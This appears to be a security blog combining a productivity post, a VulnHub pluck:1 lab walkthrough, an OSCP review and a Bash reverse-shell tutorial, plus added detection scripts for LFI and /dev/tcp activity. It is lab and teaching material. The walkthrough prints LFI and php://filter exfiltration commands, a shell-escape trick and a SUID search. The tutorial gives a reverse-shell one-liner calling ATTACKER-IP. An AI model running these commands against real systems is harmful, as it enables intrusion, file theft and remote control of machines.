Getting things done. The Cook Model

All of us have projects to finish, and many people abandon their projects for different reasons. In this post I will talk about a routine I usually follow to help me finish my projects; I hope you find it useful.

I call this routine The Cook Model. This routine is simple yet effective: just like any meal you want to prepare, you have to follow three phases in sequence to have an enjoyable meal.

1. Prepare:

This is the initial phase and, I think, the most important one. In this phase you are hungry and start preparing for the meal by buying the groceries, reading the cooking instructions and so on.

So it goes with projects: you have to know the reason why you want to start this project, why it's important to you and what the expected result is.
Your strategy must be clear and defined. Please be honest with yourself and take into consideration all the hurdles you may face and what powers or tools can help you.
Take as much time as you want in this phase to do your research, set a plan, buy tools/books, talk to people, look for alternatives and so on.
By finishing this phase you will have an agenda to follow with specific tasks and a time frame.

2. Cook:

Cook your meal! Follow the agenda from phase 1 step by step. You can't change your mind now in the middle of cooking by taking the chicken off the grill and trying to fry it! You will ruin the whole meal.

This is the action time: you have to follow your agenda step by step and believe in the work you have done in phase 1.
You have to be patient and persistent; it's a one-way route and you can't rethink the plan or try to take a detour. This is where most people fail, because they keep questioning their goal/plan and try to start all over again, and by that they start juggling around in the hope of finding a better settlement.
I can sum up this phase in one word: "commitment".

3. Result:

Now that you have done your job it's time to taste the meal: is it salty? Does it need more time? Or is it just delicious?

In this phase it's not important whether you succeed or fail; be proud of the effort you have made, because you did reach the final destination. Some people get stuck in the previous phases and can't reach this final phase, so it will be an unfinished project for them and they can't enjoy the result or evaluate the failure.
If you succeed then be happy and enjoy your achievement. If not, then there are lessons to be learned from this experience and you can start all over again by modifying phase 1 and continuing your project.

Fin:

You only need one person's approval, and this person is you. Take responsibility for your project and quit caring about other people's opinions/experiences.
Most people fail because they get stuck in an infinite loop between phase 1 and 2 for different reasons (people's opinions / self-doubt / circumstances / etc.).
This is a one-way route and you have to keep moving forward; don't hesitate or settle for less.

pluck: 1 walk-through

In this post we will walk through the pluck: 1 VM, so let's start!

Enumeration:

We will scan all TCP ports along with the top UDP ports:

root@kali:~/vulnhub/pluck# nmap -sS -p- -A --reason 192.168.17.153  \
> && nmap -sU -sV -A --top-ports 100 192.168.17.153 \
> && nmap -sU -p 161 192.168.17.153 \
> && nmap -sU -p 69 192.168.17.153 

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:32 +03
Nmap scan report for 192.168.17.153
Host is up, received arp-response (0.0010s latency).
Not shown: 65531 closed ports
Reason: 65531 resets
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA)
|_  256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA)
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pluck
3306/tcp open  mysql   syn-ack ttl 64 MySQL (unauthorized)
5355/tcp open  llmnr?  syn-ack ttl 1
MAC Address: 00:0C:29:1E:99:39 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.05 ms 192.168.17.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.03 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:34 +03
Nmap scan report for 192.168.17.153
Host is up (0.00061s latency).
Not shown: 98 closed ports
PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.17.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.24 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for 192.168.17.153
Host is up (0.00074s latency).
PORT    STATE  SERVICE
161/udp closed snmp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for 192.168.17.153
Host is up (0.00056s latency).
PORT   STATE         SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds

The website on port 80 is powered by PHP. I tried many PHP tricks to check for vulnerabilities and discovered that the site is prone to LFI and the PHP base64-encode trick!

http://192.168.17.153/index.php?page=/etc/passwd

Now we have a list of users:

  • bob
  • peter
  • paul
  • backup-user

Exploitation

I tried to brute-force and SQLi the admin login page, but no luck.

Next I went back to the users list and tried to include the backup script mentioned as the login shell of backup-user:

http://192.168.17.153/index.php?page=/usr/local/scripts/backup.sh

We could try to include the tar file directly, but that would be a total mess! So let's make use of the PHP base64-encode trick to download the file safely: encode the contents of backup.tar, cut away the HTML around it and decode it locally.

curl http://192.168.17.153/index.php?page=php://filter/convert.base64-encode/resource=/backups/backup.tar | grep 'jumbotron>' | cut -d '>' -f 2 | cut -d '<' -f 1 > backup.tar64
base64 -d backup.tar64 > backup.tar
mkdir backup ; tar -xvf backup.tar -C backup
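From the defender's side, both the /etc/passwd include and the php://filter download above leave a recognisable trace in the web server's access log. The following is an added example, not code from the original post or from the pluck VM, that scans constructed Apache access-log lines for a "page" parameter carrying an absolute path, directory traversal or a PHP stream wrapper; the parameter name, log format and sample lines are assumptions.

```python
# Added example (not from the original post): flag LFI / php://filter
# attempts like the ones used against pluck in Apache access-log lines.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache "common" log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Apr/2017:11:40:01 +0300] "GET /index.php?page=about HTTP/1.1" 200 1532
10.0.0.9 - - [24/Apr/2017:11:41:12 +0300] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 2210
10.0.0.9 - - [24/Apr/2017:11:42:30 +0300] "GET /index.php?page=php://filter/convert.base64-encode/resource=/backups/backup.tar HTTP/1.1" 200 98765
10.0.0.9 - - [24/Apr/2017:11:43:02 +0300] "GET /index.php?page=..%2F..%2Fusr%2Flocal%2Fscripts%2Fbackup.sh HTTP/1.1" 200 410
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Stream wrappers that should never appear in an include path.
WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip|file|glob)://", re.IGNORECASE)


def classify_page_value(value):
    """Return a reason string if value looks like an LFI attempt, else None."""
    v = unquote(unquote(value))  # tolerate single and double URL encoding
    if WRAPPER_RE.match(v):
        return "php-wrapper"
    if v.startswith("/"):
        return "absolute-path"
    if ".." in v.replace("\\", "/").split("/"):
        return "traversal"
    return None


def scan_access_log(text, param="page"):
    """Return (client ip, decoded value, reason) for each suspicious include."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            reason = classify_page_value(value)
            if reason:
                hits.append((m.group("ip"), unquote(value), reason))
    return hits


if __name__ == "__main__":
    for ip, value, reason in scan_access_log(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{value}")
```

The durable fix on the application side is to map the "page" parameter to an allowlist of known template names rather than passing it to include().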

After extracting the archive we notice a keys folder containing SSH keys for the user Paul. We will test the keys until we get a valid SSH login:

ssh paul@192.168.17.153 -i id_key4

We are presented with a menu-type login shell, in this case Pdmenu. However, we can escape this menu by selecting Edit file and typing any file name to start vim. From vim, set the shell:

:set shell=/bin/bash

Then type the following to jump to Bash:

:shell

Privilege Escalation

I tried to escalate using kernel exploits but no luck. However, after searching for SUID binaries we notice the existence of the exim agent:

paul@pluck:~$ find / -perm -u=s -type f 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g

I tried some exploits to escalate privileges using the exim agent but they did not work for me. However, I decided to give this exploit a shot since the difference in version is minimal, and luckily this exploit works.

Flag:

and that's it.

OSCP Review

Intro:

I have been developing software for years; however, I recently had a great chance to switch my career path to the security field, and that's why I started looking for trainings to gain more skills.
Security for a software developer is writing good code, running scanners, setting up a firewall, etc.
But there is still a missing link: how do hackers break into servers, and what tools and techniques do they use?

Enter OffSec:

In my journey to find the right trainings, I reached OffSec since I was using Kali Linux as a platform for running scanners.
I was skeptical at first, but after reading different reviews I decided to enroll in the PWK course since I am a big fan of Linux and I needed a training with hands-on experience to know how hacking happens.

Materials:

Fast forward to after registration: I received the e-mail package and started reading…
Well, I have to say, this is indeed a 101 course, but the topics covered are broad and wide.
OffSec takes you on a journey through all hacking topics; you will learn the How and the Why of each concept in a self-learning way.
As Morpheus said: "I'm trying to free your mind, Neo. But I can only show you the door. You're the one that has to walk through it."
I spent two months reading the materials without rushing, to know all the topics and connect the dots before hitting the lab. At the same time I solved the exercises and skipped the ones that required more engagement, to do them later on.

Lab:

After finishing reading the materials and taking a one-month summer vacation, I was ready to hit the lab.
I have to say the lab is just fantastic! I was overwhelmed and running around like a lost sheep in the first few days, but after that I started enumerating the whole lab network and hacking the low-hanging-fruit boxes first.
I spent approximately 3.5 months hacking the lab machines and was able to hack fantastic boxes like PAIN, Sufferance and gh0st. But personally I like dotty.

Exam:

After hitting 32 boxes, I felt ready to take the exam to test my skills.
My first attempt went badly and I failed; the exam is BRUTAL, but it was an eye-opener and I learned my weaknesses.
I took multiple exam attempts, and with each attempt I was gaining more and more skills. It's a tough process, but the aftermath of it is HUGE and I learned/tuned a lot of things.
If you want to take the exam then you have to be 100% ready for it. 80% or 90% will not be enough; you have to Try Harder and Harder.
On Saturday 25-3-2017 I passed the OSCP exam with a BIG smile. It went smoothly and I was able to finish the exam along with writing the report in the 24-hour time slot.

Recommendations:

  • You have to change your mindset: in this course you have to think like a hacker or a breaker, because developers expect the code to work in a certain way but the hacker will try to twist the code to get in.
  • Study and research: you have to read a lot of information and test it to understand what is happening and why.
  • It's simple: sometimes it's plain simple to hack in and you do not have to go deep into the rabbit hole.
  • Set a game plan: know your target very well and spend time reading the enumeration data to set a proper game plan before you start hacking; otherwise you will waste your resources.
  • Practice: download images from Vulnhub.com and practice. I also find walk-throughs a great way to learn from other people's experience.

Final Thoughts:

I encourage anyone seriously interested in Information Security or Hacking to enroll in the PWK course; the learning curve is steep and you will learn a lot of things in a short amount of time.
You have to dedicate effort/time to this course; otherwise you can't learn or pass the exam.
The community and the OffSec people are great and you will learn many new things. I will definitely enroll in other courses and try to engage more in the community.

References:

The links below helped me a lot when I was studying the course:

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

http://www.fuzzysecurity.com/tutorials/16.html

https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

http://www.primalsecurity.net/0x0-exploit-tutorial-buffer-overflow-vanilla-eip-overwrite-2/

http://www.blackhillsinfosec.com/?p=4645

https://highon.coffee/blog/lfi-cheat-sheet/

http://netsec.ws/?p=331

https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

Bash Reverse Shell

In this post I will talk about a special type of reverse shell. I like this type of shell because you can mostly use tools that already exist on your target.

But before talking about the Bash reverse shell in detail, I would like to mention some limitations of this type of shell:

  • You can't use this type of shell against Windows targets, since bash is not there.
  • You can't use this type of shell if the Unix-like target does not have the Bash package installed. However, you can use the ancient Bourne shell (sh).

Now all you have to do is set up an nc listener on your attacking machine:

nc -nlvp PORT

Then issue this command on your target:

/bin/bash -i >& /dev/tcp/ATTACKER-IP/ATTACKER-PORT 0>&1

where:

  • ATTACKER-IP is your attacking machine's IP address
  • ATTACKER-PORT is the port used by the nc listener

And that's it! You should have a bash reverse shell by now. This reverse shell works thanks to Bash's built-in /dev/tcp network redirection and Unix-like file descriptor handling: stdout and stderr are sent to the socket, and stdin is read from it.

You can replace /bin/bash with /bin/sh if the target machine lacks the bash package.
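For defenders, the one-liner above is easy to recognise in process telemetry: /dev/tcp and /dev/udp are pseudo-files implemented inside bash itself, not device nodes on disk, so any command line that opens them deserves a look (and egress filtering at the firewall is what actually stops the connection). The following added example, not code from the original post, inspects constructed process command lines of the kind captured by auditd execve records or an EDR agent and extracts the protocol, host and port of such a redirection; the sample command lines and hosts are assumptions.

```python
# Added example (not from the original post): flag bash /dev/tcp and
# /dev/udp redirections in recorded process command lines. The sample
# command lines below are constructed; the hosts use documentation ranges.
import re

SAMPLE_CMDLINES = [
    "/bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    "/bin/sh -i >& /dev/tcp/198.51.100.3/443 0>&1",
    "/bin/bash /usr/local/scripts/backup.sh",
    "tar -cf /backups/backup.tar /home",
]

# /dev/tcp and /dev/udp only exist inside bash, so a match is always a
# network connection opened by the shell itself.
NET_REDIR_RE = re.compile(
    r"/dev/(?P<proto>tcp|udp)/(?P<host>[A-Za-z0-9.\-]+)/(?P<port>\d{1,5})"
)
# ">&" sends both stdout and stderr to the socket; "0>&1" pulls stdin from
# it too, which is what turns a plain connection into an interactive shell.
STDIO_TO_SOCKET_RE = re.compile(r">&\s*/dev/(tcp|udp)/")
STDIN_FROM_SOCKET = "0>&1"


def inspect_cmdline(cmd):
    """Describe a bash network redirection in cmd, or return None if absent."""
    m = NET_REDIR_RE.search(cmd)
    if not m:
        return None
    return {
        "proto": m.group("proto"),
        "host": m.group("host"),
        "port": int(m.group("port")),
        # both flags True means stdin, stdout and stderr all ride the socket
        "stdio_to_socket": bool(STDIO_TO_SOCKET_RE.search(cmd)),
        "stdin_from_socket": STDIN_FROM_SOCKET in cmd,
    }


def scan_cmdlines(cmds):
    """Return (cmdline, finding) pairs for every command line that matches."""
    findings = []
    for cmd in cmds:
        info = inspect_cmdline(cmd)
        if info:
            findings.append((cmd, info))
    return findings


if __name__ == "__main__":
    for cmd, info in scan_cmdlines(SAMPLE_CMDLINES):
        interactive = info["stdio_to_socket"] and info["stdin_from_socket"]
        print(f"{info['proto']}://{info['host']}:{info['port']} "
              f"interactive={interactive} <- {cmd}")
```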

Final Thoughts:

As always, you have to enumerate your target to know the environment in front of you. In our case you have to check whether Bash or sh exists and where it is located.

This post serves as a short note on how to create a Bash reverse shell; please read more about the software or technology used in the references.

Regards,

Fahad.


References: